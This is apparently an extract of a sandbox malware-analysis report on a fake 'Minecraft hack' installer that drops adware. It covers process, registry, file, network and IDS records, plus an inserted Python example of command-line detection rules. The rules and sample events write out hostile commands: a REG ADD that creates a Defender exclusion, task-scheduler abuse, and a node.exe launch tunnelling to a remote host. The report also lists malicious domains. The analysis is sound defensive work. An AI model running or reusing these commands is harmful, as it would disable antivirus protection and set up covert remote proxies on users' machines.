CMD: "C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=964,14865141138030123061,3892563664501406752,131072 --disable-gpu-compositing --service-pipe-token=12099868295543321018 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:57.0) Gecko/20100101 Firefox/57.0" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --disable-client-side-phishing-detection --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12099868295543321018 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
Path: C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google Inc.
Integrity Level: HIGH
Description: Google Chrome
Exit code: 0
Version: 73.0.3683.75
Modules (images):
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
PID: 1216
CMD: "C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-automation --enable-logging --log-level=0 --test-type=webdriver --field-trial-handle=972,1565396668729221956,3094166035896812107,131072 --service-pipe-token=12534788424282868290 --enable-blink-features=ShadowDOMV0 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" --user-data-dir="C:\Users\admin\AppData\Roaming\view\Chrome\NewProfile" --extension-process --disable-client-side-phishing-detection --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=12534788424282868290 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1
Path: C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google Inc.
Integrity Level: HIGH
Description: Google Chrome
Exit code: 0
Version: 73.0.3683.75
Modules (images):
c:\users\admin\appdata\roaming\view\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\view\chrome\application\73.0.3683.75\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
PID: 1304
CMD: "C:\Users\admin\AppData\Roaming\infoSiw\nodes\node\node.exe" "C:\Users\admin\AppData\Roaming\infoSiw\nodes\cl\app.js" NODE_DEBUG=1 -s 188.42.219.232:2221 -u 00000000000000000000000000000000 --socks=localhost:2001
Path: C:\Users\admin\AppData\Roaming\infoSiw\nodes\node\node.exe
Parent process: cmd.exe
User: admin
Company: Node.js
Integrity Level: HIGH
Description: Node.js: Server-side JavaScript
Exit code: 0
Version: 8.9.4
Modules (images):
c:\users\admin\appdata\roaming\infosiw\nodes\node\node.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\gdi32.dll
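The process records above carry the command-line evidence behind several of the signatures: reg.exe writing a Defender exclusion policy as SYSTEM, schtasks driven by a dropped executable with random-looking task names, a private copy of Chrome 73 under AppData run with WebDriver flags and a User-Agent that claims to be Chrome 67 or Firefox on macOS, and a user-writable node.exe given a remote host:port and a SOCKS option. The Python below is an added example, not part of the ANY.RUN report: it turns those observations into process-creation triage rules and runs them over events constructed from the command lines shown here (PIDs, paths and arguments copied from the records, long Chrome command lines abbreviated). The rule names, the parent allow-list and the ProcEvent record format are this example's own assumptions, not ANY.RUN signatures.

```python
"""Command-line triage rules over process-creation events (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str               # image path as recorded
    cmdline: str
    parent: str              # parent image name only, as the report gives it
    user: str = "admin"
    file_version: str = ""   # PE version of the image, when the report shows it


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
DEFENDER_EXCLUSIONS = re.compile(r"\\Windows Defender\\Exclusions\\", re.IGNORECASE)
REG_ADD = re.compile(r'\breg(?:\.exe)?"?\s+add\b', re.IGNORECASE)
TASK_NAME = re.compile(r'/TN\s+"?([^"\s]+)"?', re.IGNORECASE)
UA_OVERRIDE = re.compile(r'--user-agent="([^"]*)"')
CHROME_MAJOR = re.compile(r"Chrome/(\d+)\.")
AUTOMATION_FLAGS = ("--enable-automation", "--test-type=webdriver", "--no-sandbox")
# Assumed allow-list of parents that legitimately drive schtasks on a workstation.
SCHTASKS_OK_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "mmc.exe", "svchost.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_defender_exclusion(ev: ProcEvent) -> Finding | None:
    """reg.exe adding a value under the Defender Exclusions policy key."""
    if image_name(ev.image) == "reg.exe" and REG_ADD.search(ev.cmdline) \
            and DEFENDER_EXCLUSIONS.search(ev.cmdline):
        return Finding(ev.pid, "defender_exclusion_added", f"user={ev.user} {ev.cmdline}")
    return None


def rule_schtasks_control(ev: ProcEvent) -> Finding | None:
    """schtasks driven by a parent outside the allow-list; reports the /TN value if present."""
    if image_name(ev.image) != "schtasks.exe" or ev.parent.lower() in SCHTASKS_OK_PARENTS:
        return None
    m = TASK_NAME.search(ev.cmdline)
    return Finding(ev.pid, "schtasks_from_unexpected_parent",
                   f"parent={ev.parent} task={m.group(1) if m else '?'}")


def rule_browser_automation(ev: ProcEvent) -> Finding | None:
    """chrome.exe from a user-writable path, under WebDriver control, with a spoofed User-Agent."""
    if image_name(ev.image) != "chrome.exe" or not USER_WRITABLE.match(ev.image):
        return None
    flags = [f for f in AUTOMATION_FLAGS if f in ev.cmdline]
    if not flags:
        return None
    reasons = ["flags=" + ",".join(flags)]
    m = UA_OVERRIDE.search(ev.cmdline)
    if m:
        claimed = CHROME_MAJOR.search(m.group(1))
        actual = ev.file_version.split(".", 1)[0]
        if not claimed:
            reasons.append("ua_claims_non_chrome")
        elif actual and claimed.group(1) != actual:
            reasons.append(f"ua_claims_chrome_{claimed.group(1)}_binary_is_{actual}")
    return Finding(ev.pid, "browser_automation_spoofed_ua", " ".join(reasons))


def rule_node_network_args(ev: ProcEvent) -> Finding | None:
    """User-writable node.exe launched with a remote host:port and/or a SOCKS option."""
    if image_name(ev.image) != "node.exe" or not USER_WRITABLE.match(ev.image):
        return None
    endpoint = re.search(r"\s-s\s+(\d{1,3}(?:\.\d{1,3}){3}:\d+)", ev.cmdline)
    socks = re.search(r"--socks=(\S+)", ev.cmdline)
    if not (endpoint or socks):
        return None
    return Finding(ev.pid, "userland_node_with_network_args",
                   f"endpoint={endpoint.group(1) if endpoint else '-'} "
                   f"socks={socks.group(1) if socks else '-'}")


RULES = (rule_defender_exclusion, rule_schtasks_control, rule_browser_automation, rule_node_network_args)


def run_rules(events: list[ProcEvent]) -> list[Finding]:
    return [f for ev in events for rule in RULES if (f := rule(ev))]


CHROME = r"C:\Users\admin\AppData\Roaming\view\Chrome\Application\chrome.exe"
NODE = r"C:\Users\admin\AppData\Roaming\infoSiw\nodes\node\node.exe"
UA_CHROME67 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
UA_FIREFOX = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6; rv:57.0) Gecko/20100101 Firefox/57.0"
# Constructed from the report's process records (Chrome argument lists abbreviated).
SAMPLE_EVENTS = [
    ProcEvent(848, r"C:\Windows\system32\reg.exe",
              r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\qZmfXbOWrNBFKIgg" /t REG_DWORD /d 0',
              parent="cmd.exe", user="SYSTEM"),
    ProcEvent(392, r"C:\Windows\system32\schtasks.exe", r'schtasks /DELETE /TN "CRnxQxdxhdYHO2" /F', parent="kCCZxQhrJpnFHvoi.exe"),
    ProcEvent(664, r"C:\Windows\system32\schtasks.exe", r'schtasks /run /tn "QIvhlMLYbMJLHRu"', parent="kCCZxQhrJpnFHvoi.exe"),
    ProcEvent(776, CHROME, f'"{CHROME}" --type=renderer --no-sandbox --enable-automation --test-type=webdriver --user-agent="{UA_CHROME67}"',
              parent="chrome.exe", file_version="73.0.3683.75"),
    ProcEvent(1020, CHROME, f'"{CHROME}" --type=renderer --no-sandbox --enable-automation --test-type=webdriver --user-agent="{UA_FIREFOX}"',
              parent="chrome.exe", file_version="73.0.3683.75"),
    ProcEvent(1304, NODE, f'"{NODE}" "C:\\Users\\admin\\AppData\\Roaming\\infoSiw\\nodes\\cl\\app.js" NODE_DEBUG=1 -s 188.42.219.232:2221 -u 00000000000000000000000000000000 --socks=localhost:2001',
              parent="cmd.exe"),
    ProcEvent(560, r"C:\Users\admin\AppData\Roaming\infoSiw\RunSI.exe", r"C:\Users\admin\AppData\Roaming\infoSiw\RunSI.exe", parent="setup.exe"),
]

if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f.pid, f.rule, f.detail)
```

Six of the seven constructed events produce a finding; RunSI.exe (PID 560) does not, because nothing in its command line matches a rule, which is the point: the rules key on arguments and paths, not on the unfamiliar file name. The Defender rule is the one worth wiring to a high-severity alert on its own, since a SYSTEM-level REG ADD under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions has no routine cause on a workstation.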
Total events: 7 328
Read events: 5 878
Write events: 1 320
Delete events: 130

Modification events

Process: (3624) MINECRAFT_HACK_V2.32.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0

Process: (3624) MINECRAFT_HACK_V2.32.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 1

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation: write
Name: NodeSlots
Value: 0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation: write
Name: MRUListEx
Value: 0700000001000000000000000200000006000000030000000500000004000000FFFFFFFF

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\7
Operation: write
Name: MRUListEx
Value: 0000000001000000FFFFFFFF

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\Shell
Operation: write
Name: SniffedFolderType
Value: Generic

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\Shell
Operation: write
Name: SniffedFolderType
Value: Pictures

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}
Operation: write
Name: Mode
Value: 1

Process: (3060) wS1paWlpD.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\53\ComDlgLegacy\{B3690E58-E961-423B-B687-386EBFD83239}
Operation: write
Name: LogicalViewMode
Value: 3
Executable files: 231
Suspicious files: 297
Text files: 7 697
Unknown types: 101

Dropped files

Columns: PID, Process, Filename, Type (MD5 and SHA256 values were not captured in this extract; empty cells are omitted below).

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\Users\admin\AppData\Local\Temp\0189-60d4-602e-70d3\MailRu.ico

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\Users\admin\AppData\Local\Temp\dac6-4e7c-bf1f-0d3f\GoMailRu.ico

PID: 3060 | Process: wS1paWlpD.exe
Filename: C:\Users\admin\AppData\Local\Temp\TMPE768.tmp

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\MailRu.ico
Type: image

PID: 2976 | Process: wed8489feea54.tmp
Filename: C:\Program Files\Smart Application Controller\is-LANV5.tmp

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\ProgramData\Mail.Ru\Id
Type: text

PID: 2976 | Process: wed8489feea54.tmp
Filename: C:\Program Files\Smart Application Controller\is-BS21L.tmp

PID: 2248 | Process: w75638d09e349.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk
Type: lnk

PID: 2976 | Process: wed8489feea54.tmp
Filename: C:\Program Files\Smart Application Controller\is-II1EH.tmp
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 106
TCP/UDP connections: 192
DNS requests: 68
Threats: 41

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3060 | wS1paWlpD.exe | GET | | 104.18.52.148:80 | http://mdis.fun/files/advertising/e0cf1f47118daebc5b16269099ad7347.txt | US | | | malicious
3060 | wS1paWlpD.exe | GET | | 104.18.52.148:80 | http://mdis.fun/files/advertising/03f544613917945245041ea1581df0c2.txt | US | | | malicious
2248 | w75638d09e349.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=desktop_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_mailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
2248 | w75638d09e349.exe | GET | | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=7&mr_service=0&os=win6.1&tool=sputnik&GUID=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&common_rfr=811550&install_id=%7BE800C5A7-68DE-4A99-B00E-B7C074B9CBA7%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | | | suspicious
3964 | MailRuUpdater.exe | GET | | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=mru_online&tool=mrupdater&masterid=%7B61BC1B0B-D212-4141-A951-9B7D670A1260%7D&user_id=%7B1B063FC4-C4C1-4730-8591-9FB97FD5DAB3%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.0.0.176&mailru_guard=0&mailru_updater=1&comp_mem=3583&tool_mem=5&elapsed_time=0&mr_service=0&os=win6.1&install_id=%7B4F8DC12F-1414-499E-B0B3-857E7EB20713%7D&GUID=%7B4F8DC12F-1414-499E-B0B3-857E7EB20713%7D | RU | | | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3060 | wS1paWlpD.exe | 104.18.52.148:80 | mdis.fun | Cloudflare Inc | US | shared
3060 | wS1paWlpD.exe | 104.31.83.250:80 | mfile.site | Cloudflare Inc | US | shared
2248 | w75638d09e349.exe | 217.69.139.247:443 | xmlbinupdate.mail.ru | Limited liability company Mail.Ru | RU | malicious
2248 | w75638d09e349.exe | 217.69.139.122:443 | conserv.go.mail.ru | Limited liability company Mail.Ru | RU | unknown
2248 | w75638d09e349.exe | 217.69.139.245:443 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
2248 | w75638d09e349.exe | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
2248 | w75638d09e349.exe | 217.69.139.110:443 | mailruupdater.cdnmail.ru | Limited liability company Mail.Ru | RU | malicious
| | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious
2976 | wed8489feea54.tmp | 109.206.179.254:80 | client.updsoft.net | Serverel Inc. | NL | malicious
2360 | na_runner.exe | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious

DNS requests

Domain | IP | Reputation
mdis.fun | 104.18.52.148, 104.18.53.148 | malicious
mfile.site | 104.31.83.250, 104.31.82.250 | suspicious
xmlbinupdate.mail.ru | 217.69.139.247 | shared
conserv.go.mail.ru | 217.69.139.122 | unknown
mrds.mail.ru | 217.69.139.245 | suspicious
mailruupdater.cdnmail.ru | 217.69.139.110 | unknown
xtnmailru.cdnmail.ru | 217.69.139.110 | unknown
client.updsoft.net | 109.206.179.254 | unknown
binupdate.mail.ru | 217.69.139.245 | shared
gosoftdl.mail.ru | 94.100.180.110 | shared

Threats

PID | Process | Class | Message
3060 | wS1paWlpD.exe | Misc activity | ADWARE [PTsecurity] Win32.SoftPulse.gikv
3060 | wS1paWlpD.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload
3060 | wS1paWlpD.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] PE EXE or DLL Windows file download HTTP (base64 encoded)
3956 | smappscontroller.exe | A Network Trojan was detected | ET TROJAN Suspicious POST With Reference to WINDOWS Folder Possible Malware Infection
3072 | mrupdsrv.exe | Misc activity | ADWARE [PTsecurity] Win32/MailRuSputnik.ru Agent PUA
3060 | wS1paWlpD.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload
3072 | mrupdsrv.exe | Misc activity | ADWARE [PTsecurity] Win32/MailRuSputnik.ru Agent PUA
2280 | wa92e4e31ddfa.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
2280 | wa92e4e31ddfa.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
2280 | wa92e4e31ddfa.exe | Misc activity | SUSPICIOUS [PTsecurity] Suspicious HTTP header - Sometimes used by hostile installer
15 ETPRO signatures available at the full report
Process | Message
MailRuUpdater.exe | RunAsService: Entry
MailRuUpdater.exe | switches::kUpdateService run to update
MailRuUpdater.exe | Service::Update update operation is proceed
MailRuUpdater.exe | Updater.Mail.Ru: SERVICE_CONTROL_STOP
MailRuUpdater.exe | RunAsService: Exit
MailRuUpdater.exe | Service::StopService done
MailRuUpdater.exe | Service::CopyMeTo program files done
MailRuUpdater.exe | RunAsService: Entry
MailRuUpdater.exe | Service::StartService done
MailRuUpdater.exe | Updater.Mail.Ru: SERVICE_CONTROL_STOP